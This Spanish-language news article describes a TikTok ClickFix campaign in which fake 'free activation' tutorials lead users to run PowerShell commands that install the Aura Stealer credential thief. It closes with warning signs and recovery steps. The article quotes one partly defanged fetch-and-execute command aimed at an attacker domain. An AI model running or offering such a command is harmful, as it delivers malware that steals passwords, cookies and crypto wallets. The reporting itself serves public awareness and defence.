- Videos virales prometen software y servicios premium gratis, pero esconden ataques ClickFix que instalan malware.
- Los comandos en PowerShell descargan scripts y dos ejecutables; uno es Aura Stealer, ladrón de credenciales.
- Las víctimas arriesgan contraseñas, cookies y carteras cripto; podría haber persistencia en el sistema.
- Si caes: cambia contraseñas, pasa antivirus, desconecta redes sensibles y reporta los videos a TikTok.
Una oleada de falsos tutoriales en TikTok está aprovechando la promesa de activar software o servicios premium “gratis” para colar malware en los equipos de los usuarios. Bajo la apariencia de guías rápidas y sencillas, estos videos empujan a la gente a ejecutar comandos en PowerShell que terminan entregando el control del dispositivo a los atacantes.
Investigadores del SANS Internet Storm Center (ISC), entre ellos Xavier Mertens, así como medios especializados como BleepingComputer y firmas de ciberseguridad, han documentado una campaña que se sirve de la técnica ClickFix. La maniobra convence a las víctimas de que están resolviendo un problema técnico cuando, en realidad, están iniciando la instalación silenciosa de malware para robar contraseñas y otros datos sensibles.
Tutoriales virales y la técnica ClickFix
Las cuentas implicadas publican videos cortos que prometen activar Windows, Photoshop, Netflix o Spotify sin pagar, guiando al espectador paso a paso. El contenido emplea diseños que imitan herramientas de soporte y mensajes que transmiten falsa legitimidad, lo que anima a muchos usuarios a actuar sin pensárselo demasiado.
El truco, identificado como ClickFix, consiste en ofrecer instrucciones muy visuales para que el propio usuario copie y pegue comandos con permisos de administrador en PowerShell. En ocasiones, los videos muestran cadenas como iex (irm slmgr[.]win/photoshop) —parcialmente ofuscadas aquí para evitar su abuso—, sugiriendo que con eso bastará para “activar” el programa.
En segundo plano, esos comandos conectan el equipo con servidores remotos controlados por los atacantes, desde los que se descargan nuevos scripts y ejecutables maliciosos. La brevedad del formato y la popularidad de los creadores favorecen que miles de usuarios copien el proceso sin reparar en los riesgos.
Según el ISC, estas campañas han encontrado en TikTok un caldo de cultivo ideal: gran visibilidad, alta confianza en los tutoriales “express” y audiencias jóvenes con menor bagaje técnico.
Cadena de infección: scripts, ejecutables y robo de datos
Los análisis técnicos citados por BleepingComputer describen una cadena de ejecución en dos fases. Primero, PowerShell descarga y lanza un script adicional que actúa como puente para traer dos archivos ejecutables desde infraestructura remota —en ocasiones, alojada en servicios legítimos como Cloudflare Pages—.
El más peligroso de estos ejecutables es una variante de Aura Stealer, un troyano especializado en extraer credenciales almacenadas en navegadores, cookies de autenticación y datos de carteras de criptomonedas. Todo el material sustraído se envía posteriormente a servidores bajo control de los actores maliciosos.
Del segundo ejecutable se sabe que puede compilar código sobre la marcha, aunque su función final está aún por esclarecer. Los expertos barajan que sirva para mantener persistencia, ampliar capacidades del ataque o adaptar el comportamiento al perfil de la víctima.
El resultado para quien cae en la trampa puede ser serio: además del robo de contraseñas y datos personales, el equipo comprometido podría emplearse para instalar módulos adicionales, ejecutar acciones no autorizadas o participar en actividades delictivas sin conocimiento del usuario.
Por qué se propaga en TikTok y señales de alerta
La plataforma potencia la difusión por su formato rápido y la inercia de confiar en lo que “funciona” en un video popular. Muchos clips suman miles de visualizaciones y, al estar presentados como consejos educativos, reducen las barreras de desconfianza.
Los atacantes, además, suelen personalizar comandos y enlaces con el nombre del software prometido, elevando la sensación de legitimidad. Algunos videos incluso usan voces generadas por IA y ediciones pulidas para reforzar el señuelo.
Conviene sospechar de cualquier tutorial que prometa “activar”, “desbloquear” o “hackear” programas de pago. Desconfía también si te piden abrir la terminal, copiar comandos, descargar archivos fuera de sitios oficiales o instalar paquetes no verificados.
Indicios añadidos: cuentas con poca actividad, comentarios cerrados, vídeos repetidos con mínimas variaciones o enlaces acortados que no revelan el destino real. Ante la duda, mejor no ejecutar nada.
Qué hacer si seguiste uno de estos tutoriales
Si has copiado algún comando o instalado algo siguiendo uno de estos vídeos, la prioridad es limitar el daño y recuperar el control. Actúa cuanto antes para cortar cualquier canal de exfiltración de datos o acceso remoto.
Medidas urgentes recomendadas por especialistas: cambiar todas las contraseñas (correo, redes, banca, plataformas de streaming), activar la verificación en dos pasos y evitar reutilizar claves antiguas o similares.
Ejecuta un análisis antivirus completo con firmas actualizadas, revisa procesos y servicios en segundo plano en busca de elementos desconocidos y comprueba tareas programadas o entradas de inicio que no reconozcas.
Si detectas actividad rara, desconecta el equipo de redes sensibles hasta confirmar que está limpio. Asegúrate de instalar actualizaciones del sistema operativo y descarga software únicamente desde fuentes oficiales para minimizar riesgos futuros.
Por último, utiliza las herramientas de la plataforma para reportar las cuentas y videos responsables en TikTok. Cuantos más avisos reciba el servicio, más fácil será limitar la difusión del fraude.
La campaña que circula en TikTok explota la curiosidad y la prisa por encontrar “atajos”, pero detrás hay ingeniería social bien pensada y malware con capacidad real de robar credenciales. La mejor defensa pasa por desconfiar de promesas imposibles, no ejecutar comandos de fuentes no verificadas y reforzar hábitos básicos de seguridad; si algo suena demasiado bueno para ser cierto, seguramente no lo sea.